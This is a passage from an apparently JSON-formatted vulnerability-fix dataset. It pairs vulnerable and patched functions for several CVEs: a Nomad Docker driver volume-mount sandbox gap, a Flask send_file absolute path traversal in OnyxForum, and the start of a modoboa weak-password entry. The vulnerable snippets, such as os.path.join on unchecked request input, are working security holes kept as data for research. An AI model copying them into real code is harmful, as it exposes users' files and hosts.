strings.ToLower(cap)\n\t\t\tif _, ok := hostCapsWhitelist[cap]; !ok {\n\t\t\t\tmissingCaps = append(missingCaps, cap)\n\t\t\t}\n\t\t}\n\t\tif len(missingCaps) > 0 {\n\t\t\treturn c, 
fmt.Errorf(\"Docker driver doesn't have the following caps whitelisted on this Nomad agent: %s\", missingCaps)\n\t\t}\n\t}\n\n\thostConfig.CapAdd = driverConfig.CapAdd\n\thostConfig.CapDrop = driverConfig.CapDrop\n\n\t// set SHM size\n\tif driverConfig.ShmSize != 0 {\n\t\thostConfig.ShmSize = driverConfig.ShmSize\n\t}\n\n\t// set DNS servers\n\tfor _, ip := range driverConfig.DNSServers {\n\t\tif net.ParseIP(ip) != nil {\n\t\t\thostConfig.DNS = append(hostConfig.DNS, ip)\n\t\t} else {\n\t\t\tlogger.Error(\"invalid ip address for container dns server\", \"ip\", ip)\n\t\t}\n\t}\n\n\t// Setup devices\n\tfor _, device := range driverConfig.Devices {\n\t\tdd, err := device.toDockerDevice()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\thostConfig.Devices = append(hostConfig.Devices, dd)\n\t}\n\tfor _, device := range task.Devices {\n\t\thostConfig.Devices = append(hostConfig.Devices, docker.Device{\n\t\t\tPathOnHost: device.HostPath,\n\t\t\tPathInContainer: device.TaskPath,\n\t\t\tCgroupPermissions: device.Permissions,\n\t\t})\n\t}\n\n\t// Setup mounts\n\tfor _, m := range driverConfig.Mounts {\n\t\thm, err := m.toDockerHostMount()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tif hm.Type == \"bind\" {\n\t\t\thm.Source = expandPath(task.TaskDir().Dir, hm.Source)\n\n\t\t\t// paths inside alloc dir are always allowed as they mount within a container, and treated as relative to task dir\n\t\t\tif !d.config.Volumes.Enabled && !isParentPath(task.AllocDir, hm.Source) {\n\t\t\t\treturn c, fmt.Errorf(\"volumes are not enabled; cannot mount host path: %q %q\", hm.Source, task.AllocDir)\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\tfor _, m := range task.Mounts {\n\t\thm := docker.HostMount{\n\t\t\tType: \"bind\",\n\t\t\tTarget: m.TaskPath,\n\t\t\tSource: m.HostPath,\n\t\t\tReadOnly: m.Readonly,\n\t\t}\n\n\t\t// MountPropagation is only supported by Docker on Linux:\n\t\t// https://docs.docker.com/storage/bind-mounts/#configure-bind-propagation\n\t\tif runtime.GOOS == \"linux\" {\n\t\t\thm.BindOptions = &docker.BindOptions{\n\t\t\t\tPropagation: userMountToUnixMount[m.PropagationMode],\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\t// set DNS search domains and extra hosts\n\thostConfig.DNSSearch = driverConfig.DNSSearchDomains\n\thostConfig.DNSOptions = driverConfig.DNSOptions\n\thostConfig.ExtraHosts = driverConfig.ExtraHosts\n\n\thostConfig.IpcMode = driverConfig.IPCMode\n\thostConfig.PidMode = driverConfig.PidMode\n\thostConfig.UTSMode = driverConfig.UTSMode\n\thostConfig.UsernsMode = driverConfig.UsernsMode\n\thostConfig.SecurityOpt = driverConfig.SecurityOpt\n\thostConfig.Sysctls = driverConfig.Sysctl\n\n\tulimits, err := sliceMergeUlimit(driverConfig.Ulimit)\n\tif err != nil {\n\t\treturn c, fmt.Errorf(\"failed to parse ulimit configuration: %v\", err)\n\t}\n\thostConfig.Ulimits = ulimits\n\n\thostConfig.ReadonlyRootfs = driverConfig.ReadonlyRootfs\n\n\t// set the docker network mode\n\thostConfig.NetworkMode = driverConfig.NetworkMode\n\n\t// if the driver config does not specify a network mode then try to use the\n\t// shared alloc network\n\tif hostConfig.NetworkMode == \"\" {\n\t\tif task.NetworkIsolation != nil && task.NetworkIsolation.Path != \"\" {\n\t\t\t// find the previously created parent container to join networks with\n\t\t\tnetMode := fmt.Sprintf(\"container:%s\", task.NetworkIsolation.Labels[dockerNetSpecLabelKey])\n\t\t\tlogger.Debug(\"configuring network mode for task group\", 
\"network_mode\", netMode)\n\t\t\thostConfig.NetworkMode = netMode\n\t\t} else {\n\t\t\t// docker default\n\t\t\tlogger.Debug(\"networking mode not specified; using default\")\n\t\t\thostConfig.NetworkMode = \"default\"\n\t\t}\n\t}\n\n\t// Setup port mapping and exposed ports\n\tif len(task.Resources.NomadResources.Networks) == 0 {\n\t\tif len(driverConfig.PortMap) > 0 {\n\t\t\treturn c, fmt.Errorf(\"Trying to map ports but no network interface is available\")\n\t\t}\n\t} else {\n\t\t// TODO add support for more than one network\n\t\tnetwork := task.Resources.NomadResources.Networks[0]\n\t\tpublishedPorts := map[docker.Port][]docker.PortBinding{}\n\t\texposedPorts := map[docker.Port]struct{}{}\n\n\t\tfor _, port := range network.ReservedPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated static port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", port.Value)\n\t\t}\n\n\t\tfor _, port := range network.DynamicPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated mapped port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", containerPort)\n\t\t}\n\n\t\thostConfig.PortBindings = publishedPorts\n\t\tconfig.ExposedPorts = exposedPorts\n\t}\n\n\t// If the user specified a custom command to run, we'll inject it here.\n\tif driverConfig.Command != \"\" {\n\t\t// Validate command\n\t\tif err := validateCommand(driverConfig.Command, \"args\"); err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tcmd := []string{driverConfig.Command}\n\t\tif len(driverConfig.Args) != 0 {\n\t\t\tcmd = append(cmd, driverConfig.Args...)\n\t\t}\n\t\tlogger.Debug(\"setting container startup command\", \"command\", strings.Join(cmd, \" \"))\n\t\tconfig.Cmd = cmd\n\t} else if len(driverConfig.Args) != 0 {\n\t\tconfig.Cmd = driverConfig.Args\n\t}\n\n\tif len(driverConfig.Labels) > 0 {\n\t\tconfig.Labels = driverConfig.Labels\n\t}\n\n\tlabels := make(map[string]string, len(driverConfig.Labels)+1)\n\tfor k, v := range driverConfig.Labels {\n\t\tlabels[k] = v\n\t}\n\tlabels[dockerLabelAllocID] = task.AllocID\n\tconfig.Labels = labels\n\tlogger.Debug(\"applied labels on the container\", 
\"labels\", config.Labels)\n\n\tconfig.Env = task.EnvList()\n\n\tcontainerName := fmt.Sprintf(\"%s-%s\", strings.Replace(task.Name, \"/\", \"_\", -1), task.AllocID)\n\tlogger.Debug(\"setting container name\", \"container_name\", containerName)\n\n\tvar networkingConfig *docker.NetworkingConfig\n\tif len(driverConfig.NetworkAliases) > 0 || driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig = &docker.NetworkingConfig{\n\t\t\tEndpointsConfig: map[string]*docker.EndpointConfig{\n\t\t\t\thostConfig.NetworkMode: {},\n\t\t\t},\n\t\t}\n\t}\n\n\tif len(driverConfig.NetworkAliases) > 0 {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].Aliases = driverConfig.NetworkAliases\n\t\tlogger.Debug(\"setting container network aliases\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"network_aliases\", strings.Join(driverConfig.NetworkAliases, \", \"))\n\t}\n\n\tif driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].IPAMConfig = &docker.EndpointIPAMConfig{\n\t\t\tIPv4Address: driverConfig.IPv4Address,\n\t\t\tIPv6Address: driverConfig.IPv6Address,\n\t\t}\n\t\tlogger.Debug(\"setting container network configuration\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"ipv4_address\", driverConfig.IPv4Address, \"ipv6_address\", driverConfig.IPv6Address)\n\t}\n\n\tif driverConfig.MacAddress != \"\" {\n\t\tconfig.MacAddress = driverConfig.MacAddress\n\t\tlogger.Debug(\"setting container mac address\", \"mac_address\", config.MacAddress)\n\t}\n\n\treturn docker.CreateContainerOptions{\n\t\tName: containerName,\n\t\tConfig: config,\n\t\tHostConfig: hostConfig,\n\t\tNetworkingConfig: networkingConfig,\n\t}, nil\n}"}], "fix_func": [{"id": "fix_go_260_1", "commit": "9c1073d9633691ff7ba8804f59c68b822af521bd", "file_path": "drivers/docker/driver.go", "start_line": 675, "end_line": 1061, "snippet": "func (d *Driver) createContainerConfig(task *drivers.TaskConfig, driverConfig *TaskConfig,\n\timageID string) (docker.CreateContainerOptions, error) {\n\n\t// ensure that PortMap variables are populated early on\n\ttask.Env = taskenv.SetPortMapEnvs(task.Env, driverConfig.PortMap)\n\n\tlogger := d.logger.With(\"task_name\", task.Name)\n\tvar c docker.CreateContainerOptions\n\tif task.Resources == nil {\n\t\t// Guard against missing resources. We should never have been able to\n\t\t// schedule a job without specifying this.\n\t\tlogger.Error(\"task.Resources is empty\")\n\t\treturn c, fmt.Errorf(\"task.Resources is empty\")\n\t}\n\n\tbinds, err := d.containerBinds(task, driverConfig)\n\tif err != nil {\n\t\treturn c, err\n\t}\n\tlogger.Trace(\"binding volumes\", \"volumes\", binds)\n\n\t// create the config block that will later be consumed by go-dockerclient\n\tconfig := &docker.Config{\n\t\tImage: imageID,\n\t\tEntrypoint: driverConfig.Entrypoint,\n\t\tHostname: driverConfig.Hostname,\n\t\tUser: task.User,\n\t\tTty: driverConfig.TTY,\n\t\tOpenStdin: driverConfig.Interactive,\n\t}\n\n\tif driverConfig.WorkDir != \"\" {\n\t\tconfig.WorkingDir = driverConfig.WorkDir\n\t}\n\n\thostConfig := &docker.HostConfig{\n\t\tMemory: task.Resources.LinuxResources.MemoryLimitBytes,\n\t\tCPUShares: task.Resources.LinuxResources.CPUShares,\n\n\t\t// Binds are used to mount a host volume into the container. 
We mount a\n\t\t// local directory for storage and a shared alloc directory that can be\n\t\t// used to share data between different tasks in the same task group.\n\t\tBinds: binds,\n\n\t\tStorageOpt: driverConfig.StorageOpt,\n\t\tVolumeDriver: driverConfig.VolumeDriver,\n\n\t\tPidsLimit: driverConfig.PidsLimit,\n\t}\n\n\tif _, ok := task.DeviceEnv[nvidiaVisibleDevices]; ok {\n\t\tif !d.gpuRuntime {\n\t\t\treturn c, fmt.Errorf(\"requested docker-runtime %q was not found\", d.config.GPURuntimeName)\n\t\t}\n\t\thostConfig.Runtime = d.config.GPURuntimeName\n\t}\n\n\t// Calculate CPU Quota\n\t// cfs_quota_us is the time per core, so we must\n\t// multiply the time by the number of cores available\n\t// See https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/resource_management_guide/sec-cpu\n\tif driverConfig.CPUHardLimit {\n\t\tnumCores := runtime.NumCPU()\n\t\tif driverConfig.CPUCFSPeriod < 0 || driverConfig.CPUCFSPeriod > 1000000 {\n\t\t\treturn c, fmt.Errorf(\"invalid value for cpu_cfs_period\")\n\t\t}\n\t\tif driverConfig.CPUCFSPeriod == 0 {\n\t\t\tdriverConfig.CPUCFSPeriod = task.Resources.LinuxResources.CPUPeriod\n\t\t}\n\t\thostConfig.CPUPeriod = driverConfig.CPUCFSPeriod\n\t\thostConfig.CPUQuota = int64(task.Resources.LinuxResources.PercentTicks*float64(driverConfig.CPUCFSPeriod)) * int64(numCores)\n\t}\n\n\t// Windows does not support MemorySwap/MemorySwappiness #2193\n\tif runtime.GOOS == \"windows\" {\n\t\thostConfig.MemorySwap = 0\n\t\thostConfig.MemorySwappiness = -1\n\t} else {\n\t\thostConfig.MemorySwap = task.Resources.LinuxResources.MemoryLimitBytes // MemorySwap is memory + swap.\n\t}\n\n\tloggingDriver := driverConfig.Logging.Type\n\tif loggingDriver == \"\" {\n\t\tloggingDriver = driverConfig.Logging.Driver\n\t}\n\n\thostConfig.LogConfig = docker.LogConfig{\n\t\tType: loggingDriver,\n\t\tConfig: driverConfig.Logging.Config,\n\t}\n\n\tif hostConfig.LogConfig.Type == \"\" && hostConfig.LogConfig.Config == nil {\n\t\tlogger.Trace(\"no docker log driver provided, defaulting to json-file\")\n\t\thostConfig.LogConfig.Type = \"json-file\"\n\t\thostConfig.LogConfig.Config = map[string]string{\n\t\t\t\"max-file\": \"2\",\n\t\t\t\"max-size\": \"2m\",\n\t\t}\n\t}\n\n\tlogger.Debug(\"configured resources\", \"memory\", hostConfig.Memory,\n\t\t\"cpu_shares\", hostConfig.CPUShares, \"cpu_quota\", hostConfig.CPUQuota,\n\t\t\"cpu_period\", hostConfig.CPUPeriod)\n\tlogger.Debug(\"binding directories\", \"binds\", hclog.Fmt(\"%#v\", hostConfig.Binds))\n\n\t// set privileged mode\n\tif driverConfig.Privileged && !d.config.AllowPrivileged {\n\t\treturn c, fmt.Errorf(`Docker privileged mode is disabled on this Nomad agent`)\n\t}\n\thostConfig.Privileged = driverConfig.Privileged\n\n\t// set capabilities\n\thostCapsWhitelistConfig := d.config.AllowCaps\n\thostCapsWhitelist := make(map[string]struct{})\n\tfor _, cap := range hostCapsWhitelistConfig {\n\t\tcap = strings.ToLower(strings.TrimSpace(cap))\n\t\thostCapsWhitelist[cap] = struct{}{}\n\t}\n\n\tif _, ok := hostCapsWhitelist[\"all\"]; !ok {\n\t\teffectiveCaps, err := tweakCapabilities(\n\t\t\tstrings.Split(dockerBasicCaps, \",\"),\n\t\t\tdriverConfig.CapAdd,\n\t\t\tdriverConfig.CapDrop,\n\t\t)\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\tvar missingCaps []string\n\t\tfor _, cap := range effectiveCaps {\n\t\t\tcap = strings.ToLower(cap)\n\t\t\tif _, ok := hostCapsWhitelist[cap]; !ok {\n\t\t\t\tmissingCaps = append(missingCaps, cap)\n\t\t\t}\n\t\t}\n\t\tif len(missingCaps) > 0 {\n\t\t\treturn c, 
fmt.Errorf(\"Docker driver doesn't have the following caps whitelisted on this Nomad agent: %s\", missingCaps)\n\t\t}\n\t}\n\n\thostConfig.CapAdd = driverConfig.CapAdd\n\thostConfig.CapDrop = driverConfig.CapDrop\n\n\t// set SHM size\n\tif driverConfig.ShmSize != 0 {\n\t\thostConfig.ShmSize = driverConfig.ShmSize\n\t}\n\n\t// set DNS servers\n\tfor _, ip := range driverConfig.DNSServers {\n\t\tif net.ParseIP(ip) != nil {\n\t\t\thostConfig.DNS = append(hostConfig.DNS, ip)\n\t\t} else {\n\t\t\tlogger.Error(\"invalid ip address for container dns server\", \"ip\", ip)\n\t\t}\n\t}\n\n\t// Setup devices\n\tfor _, device := range driverConfig.Devices {\n\t\tdd, err := device.toDockerDevice()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\thostConfig.Devices = append(hostConfig.Devices, dd)\n\t}\n\tfor _, device := range task.Devices {\n\t\thostConfig.Devices = append(hostConfig.Devices, docker.Device{\n\t\t\tPathOnHost: device.HostPath,\n\t\t\tPathInContainer: device.TaskPath,\n\t\t\tCgroupPermissions: device.Permissions,\n\t\t})\n\t}\n\n\t// Setup mounts\n\tfor _, m := range driverConfig.Mounts {\n\t\thm, err := m.toDockerHostMount()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tswitch hm.Type {\n\t\tcase \"bind\":\n\t\t\thm.Source = expandPath(task.TaskDir().Dir, hm.Source)\n\n\t\t\t// paths inside alloc dir are always allowed as they mount within\n\t\t\t// a container, and treated as relative to task dir\n\t\t\tif !d.config.Volumes.Enabled && !isParentPath(task.AllocDir, hm.Source) {\n\t\t\t\treturn c, fmt.Errorf(\n\t\t\t\t\t\"volumes are not enabled; cannot mount host path: %q %q\",\n\t\t\t\t\thm.Source, task.AllocDir)\n\t\t\t}\n\t\tcase \"tmpfs\":\n\t\t\t// no source, so no sandbox check required\n\t\tdefault: // \"volume\", but also any new thing that comes along\n\t\t\tif !d.config.Volumes.Enabled {\n\t\t\t\treturn c, fmt.Errorf(\n\t\t\t\t\t\"volumes are not enabled; cannot mount volume: %q\", hm.Source)\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\tfor _, m := range task.Mounts {\n\t\thm := docker.HostMount{\n\t\t\tType: \"bind\",\n\t\t\tTarget: m.TaskPath,\n\t\t\tSource: m.HostPath,\n\t\t\tReadOnly: m.Readonly,\n\t\t}\n\n\t\t// MountPropagation is only supported by Docker on Linux:\n\t\t// https://docs.docker.com/storage/bind-mounts/#configure-bind-propagation\n\t\tif runtime.GOOS == \"linux\" {\n\t\t\thm.BindOptions = &docker.BindOptions{\n\t\t\t\tPropagation: userMountToUnixMount[m.PropagationMode],\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\t// set DNS search domains and extra hosts\n\thostConfig.DNSSearch = driverConfig.DNSSearchDomains\n\thostConfig.DNSOptions = driverConfig.DNSOptions\n\thostConfig.ExtraHosts = driverConfig.ExtraHosts\n\n\thostConfig.IpcMode = driverConfig.IPCMode\n\thostConfig.PidMode = driverConfig.PidMode\n\thostConfig.UTSMode = driverConfig.UTSMode\n\thostConfig.UsernsMode = driverConfig.UsernsMode\n\thostConfig.SecurityOpt = driverConfig.SecurityOpt\n\thostConfig.Sysctls = driverConfig.Sysctl\n\n\tulimits, err := sliceMergeUlimit(driverConfig.Ulimit)\n\tif err != nil {\n\t\treturn c, fmt.Errorf(\"failed to parse ulimit configuration: %v\", err)\n\t}\n\thostConfig.Ulimits = ulimits\n\n\thostConfig.ReadonlyRootfs = driverConfig.ReadonlyRootfs\n\n\t// set the docker network mode\n\thostConfig.NetworkMode = driverConfig.NetworkMode\n\n\t// if the driver config does not specify a network mode then try to use the\n\t// shared alloc network\n\tif hostConfig.NetworkMode == \"\" 
{\n\t\tif task.NetworkIsolation != nil && task.NetworkIsolation.Path != \"\" {\n\t\t\t// find the previously created parent container to join networks with\n\t\t\tnetMode := fmt.Sprintf(\"container:%s\", task.NetworkIsolation.Labels[dockerNetSpecLabelKey])\n\t\t\tlogger.Debug(\"configuring network mode for task group\", \"network_mode\", netMode)\n\t\t\thostConfig.NetworkMode = netMode\n\t\t} else {\n\t\t\t// docker default\n\t\t\tlogger.Debug(\"networking mode not specified; using default\")\n\t\t\thostConfig.NetworkMode = \"default\"\n\t\t}\n\t}\n\n\t// Setup port mapping and exposed ports\n\tif len(task.Resources.NomadResources.Networks) == 0 {\n\t\tif len(driverConfig.PortMap) > 0 {\n\t\t\treturn c, fmt.Errorf(\"Trying to map ports but no network interface is available\")\n\t\t}\n\t} else {\n\t\t// TODO add support for more than one network\n\t\tnetwork := task.Resources.NomadResources.Networks[0]\n\t\tpublishedPorts := map[docker.Port][]docker.PortBinding{}\n\t\texposedPorts := map[docker.Port]struct{}{}\n\n\t\tfor _, port := range network.ReservedPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated static port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", port.Value)\n\t\t}\n\n\t\tfor _, port := range network.DynamicPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated mapped port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", containerPort)\n\t\t}\n\n\t\thostConfig.PortBindings = publishedPorts\n\t\tconfig.ExposedPorts = exposedPorts\n\t}\n\n\t// If the user specified a custom command to run, we'll inject it here.\n\tif driverConfig.Command != \"\" {\n\t\t// Validate command\n\t\tif err := validateCommand(driverConfig.Command, \"args\"); err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tcmd := []string{driverConfig.Command}\n\t\tif len(driverConfig.Args) != 0 {\n\t\t\tcmd = append(cmd, driverConfig.Args...)\n\t\t}\n\t\tlogger.Debug(\"setting container startup command\", \"command\", strings.Join(cmd, \" \"))\n\t\tconfig.Cmd = cmd\n\t} else if len(driverConfig.Args) != 0 {\n\t\tconfig.Cmd = driverConfig.Args\n\t}\n\n\tif 
len(driverConfig.Labels) > 0 {\n\t\tconfig.Labels = driverConfig.Labels\n\t}\n\n\tlabels := make(map[string]string, len(driverConfig.Labels)+1)\n\tfor k, v := range driverConfig.Labels {\n\t\tlabels[k] = v\n\t}\n\tlabels[dockerLabelAllocID] = task.AllocID\n\tconfig.Labels = labels\n\tlogger.Debug(\"applied labels on the container\", \"labels\", config.Labels)\n\n\tconfig.Env = task.EnvList()\n\n\tcontainerName := fmt.Sprintf(\"%s-%s\", strings.Replace(task.Name, \"/\", \"_\", -1), task.AllocID)\n\tlogger.Debug(\"setting container name\", \"container_name\", containerName)\n\n\tvar networkingConfig *docker.NetworkingConfig\n\tif len(driverConfig.NetworkAliases) > 0 || driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig = &docker.NetworkingConfig{\n\t\t\tEndpointsConfig: map[string]*docker.EndpointConfig{\n\t\t\t\thostConfig.NetworkMode: {},\n\t\t\t},\n\t\t}\n\t}\n\n\tif len(driverConfig.NetworkAliases) > 0 {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].Aliases = driverConfig.NetworkAliases\n\t\tlogger.Debug(\"setting container network aliases\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"network_aliases\", strings.Join(driverConfig.NetworkAliases, \", \"))\n\t}\n\n\tif driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].IPAMConfig = &docker.EndpointIPAMConfig{\n\t\t\tIPv4Address: driverConfig.IPv4Address,\n\t\t\tIPv6Address: driverConfig.IPv6Address,\n\t\t}\n\t\tlogger.Debug(\"setting container network configuration\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"ipv4_address\", driverConfig.IPv4Address, \"ipv6_address\", driverConfig.IPv6Address)\n\t}\n\n\tif driverConfig.MacAddress != \"\" {\n\t\tconfig.MacAddress = driverConfig.MacAddress\n\t\tlogger.Debug(\"setting container mac address\", \"mac_address\", config.MacAddress)\n\t}\n\n\treturn docker.CreateContainerOptions{\n\t\tName: containerName,\n\t\tConfig: config,\n\t\tHostConfig: hostConfig,\n\t\tNetworkingConfig: networkingConfig,\n\t}, nil\n}"}], "vul_patch": "--- a/drivers/docker/driver.go\n+++ b/drivers/docker/driver.go\n@@ -178,12 +178,23 @@\n \t\t\treturn c, err\n \t\t}\n \n-\t\tif hm.Type == \"bind\" {\n+\t\tswitch hm.Type {\n+\t\tcase \"bind\":\n \t\t\thm.Source = expandPath(task.TaskDir().Dir, hm.Source)\n \n-\t\t\t// paths inside alloc dir are always allowed as they mount within a container, and treated as relative to task dir\n+\t\t\t// paths inside alloc dir are always allowed as they mount within\n+\t\t\t// a container, and treated as relative to task dir\n \t\t\tif !d.config.Volumes.Enabled && !isParentPath(task.AllocDir, hm.Source) {\n-\t\t\t\treturn c, fmt.Errorf(\"volumes are not enabled; cannot mount host path: %q %q\", hm.Source, task.AllocDir)\n+\t\t\t\treturn c, fmt.Errorf(\n+\t\t\t\t\t\"volumes are not enabled; cannot mount host path: %q %q\",\n+\t\t\t\t\thm.Source, task.AllocDir)\n+\t\t\t}\n+\t\tcase \"tmpfs\":\n+\t\t\t// no source, so no sandbox check required\n+\t\tdefault: // \"volume\", but also any new thing that comes along\n+\t\t\tif !d.config.Volumes.Enabled {\n+\t\t\t\treturn c, fmt.Errorf(\n+\t\t\t\t\t\"volumes are not enabled; cannot mount volume: %q\", hm.Source)\n \t\t\t}\n \t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31501", "cve_description": "The ChaoticOnyx/OnyxForum repository before 2022-05-04 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.", "cwe_info": 
{"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/ChaoticOnyx/OnyxForum", "patch_url": ["https://github.com/ChaoticOnyx/OnyxForum/commit/f25543dfc62a9694d7e4f67eebfa45e3de916053"], "programing_language": "Python", "vul_func": [{"id": "vul_py_263_1", "commit": "4077b49", "file_path": "modules/hub/hub/views.py", "start_line": 474, "end_line": 493, "snippet": " def get(self):\n server_id = request.args[\"server\"]\n path = request.args[\"path\"]\n servers = current_app.config[\"BYOND_SERVERS\"]\n\n assert path\n assert server_id\n\n server = None\n\n for srv in servers:\n if srv.id == server_id:\n server = srv\n break\n\n if server is None:\n abort(404)\n\n file_path = os.path.join(server.logs_path, path)\n return send_file(file_path, as_attachment=True)"}], "fix_func": [{"id": "fix_py_263_1", "commit": "f25543d", "file_path": "modules/hub/hub/views.py", "start_line": 476, "end_line": 495, "snippet": " def get(self):\n server_id = request.args[\"server\"]\n path = request.args[\"path\"]\n servers = current_app.config[\"BYOND_SERVERS\"]\n\n assert path\n assert server_id\n\n server = None\n\n for srv in servers:\n if srv.id == server_id:\n server = srv\n break\n\n if server is None:\n abort(404)\n\n file_path = safe_join(server.logs_path, path)\n return send_file(file_path, as_attachment=True)"}], "vul_patch": "--- a/modules/hub/hub/views.py\n+++ b/modules/hub/hub/views.py\n@@ -16,5 +16,5 @@\n if server is None:\n abort(404)\n \n- file_path = os.path.join(server.logs_path, path)\n+ file_path = safe_join(server.logs_path, path)\n return send_file(file_path, as_attachment=True)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-2160", "cve_description": "Weak Password Requirements in GitHub repository modoboa/modoboa prior to 2.1.0.\n\n", "cwe_info": {"CWE-521": {"name": "Weak Password Requirements", "description": "The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts."}}, "repo": "https://github.com/modoboa/modoboa", "patch_url": ["https://github.com/modoboa/modoboa/commit/130257c96a2392ada795785a91178e656e27015c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_92_1", "commit": "288f62a", "file_path": "modoboa/core/forms.py", "start_line": "79", "end_line": "95", "snippet": " def clean(self):\n super().clean()\n if self.errors:\n return self.cleaned_data\n oldpassword = self.cleaned_data.get(\"oldpassword\")\n newpassword = self.cleaned_data.get(\"newpassword\")\n confirmation = self.cleaned_data.get(\"confirmation\")\n if newpassword and confirmation:\n if oldpassword:\n if newpassword != confirmation:\n self.add_error(\"confirmation\", _(\"Passwords mismatch\"))\n else:\n password_validation.validate_password(\n confirmation, self.instance)\n else:\n self.add_error(\"oldpassword\", _(\"This field is required.\"))\n return self.cleaned_data"}], "fix_func": [{"id": "fix_py_92_1", "commit": "130257c", "file_path": "modoboa/core/forms.py", "start_line": "79", "end_line": "100", "snippet": " def clean(self):\n 